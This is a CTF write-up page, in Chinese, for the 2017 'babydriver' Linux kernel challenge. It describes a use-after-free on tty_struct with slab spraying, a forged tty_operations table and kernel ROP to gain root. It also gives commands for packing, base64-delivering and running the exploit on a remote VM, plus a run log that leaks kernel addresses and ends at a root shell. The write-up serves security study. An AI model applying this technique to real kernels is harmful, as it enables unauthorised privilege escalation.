Skip to content

Latest commit

 

History

History

2017-ncstisc-babydriver

Folders and files

NameName
Last commit message
Last commit date

parent directory

..

README.md

README.md

 
 

babydriver.ko

babydriver.ko

 
 

babydriver_0D09567FACCD2E891578AA83ED3BABA7.tar

babydriver_0D09567FACCD2E891578AA83ED3BABA7.tar

 
 

boot.sh

boot.sh

 
 

bzImage

bzImage

 
 

exp.c

exp.c

 
 

exp.py

exp.py

 
 

rootfs.cpio

rootfs.cpio

 
 

README.md

babydriver

solution

这个题的wp可参考这里。 我发现kernel exploit都喜欢用/dev/ptmx这个设备终端做文章,里面有太多结构体和函数指针可以利用了,file_operations,tty_operations. 这个题主要是用UAF来控制tty_struct结构体(using slab spraying),伪造一个假的tty_operations。覆盖结构体里面的哪个函数?理论上ioctl,write(attention: tty_operations没read函数指针)等函数指针应该都可以,只要通过适当操作调用到此函数就行。然后套路就跟kernel rop那篇文章的一模一样了. 还有就是如果smap也开了,就直接内核rop~反正没开KASLR.

exp参考可参考这里

how to send our exp to the remote VM?

最近练习kernel exploit时都是给的qemu的虚拟机,所以怎么执行exp是个问题~关键是虚拟机上没gcc。 我本来想在本地重打包rootfs来把exp送到VM上(too young too simple)实验一下,但是不太了解busybox的相关原理,送上去后执行不了。 打包,解包相关命令:

pack:   find . | cpio -o --format=newc | gzip > ../rootfs.cpio
unpack: gzip -dcS .img ../rootfs.cpio | cpio -id

因为虚拟机上没gcc,无法编译我们的exp,所以得想办法把exp送到我们的remote VM上。

firstway

secondway(didn't work when I tried)

TO BUILD AT LOCAL
gcc -o exp -static -nostdlib -masm=intel exp.c && gzip -kf exp && base64 exp.gz
TO EXECUTE AT REMOTE
cat a | base64 -d | gunzip - > exp && chmod +x exp && ./exp

root@Ubuntu64:~/ctf/0ctf-2017/KNOTE/release# nc 202.120.7.195 13134
dP     dP 888888ba   .88888.  d888888P  88888888b
88   .d8' 88    `8b d8'   `8b    88     88
88aaa8P'  88     88 88     88    88    a88aaaa
88   `8b. 88     88 88     88    88     88
88     88 88     88 Y8.   .8P    88     88
dP     dP dP     dP  `8888P'     dP     88888888P
oooooooooooooooooooooooooooooooooooooooooooooooooo
 
/ $ cd /home/note
cd /home/note
~ $ cat > a <<EEEOF
cat > a <<EEEOF
 
...(snip)
 
> EEEOF
EEEOF
~ $ cat a | base64 -d | gunzip - > exp && chmod +x exp && ./exp
cat a | base64 -d | gunzip - > exp && chmod +x exp && ./exp
[+] kernel address leak
  leak : ffffffffbdd0b1d0
  leak2 : ffff8ab5c1016480
  break_point : ffffffffbdd0ce2d
  kernel_base : ffffffffbd800000
  commit_creds : ffffffffbd8a5540
  prepare_kernel_cred : ffffffffbd8a5930
[+] create UAF-ed buffer x2
[+] alloc tty_struct and force free
  alloc kmalloc-1024
  finish 0x1000000/8 times free, so maybe tty_struct is force freed
[+] overwrite tty_struct
[+] trigger
/home/note # id

其实两种方法都差不多,都是先base64编码(shell无法写不可见字符),然后send到remote VM上,然后再解码即可!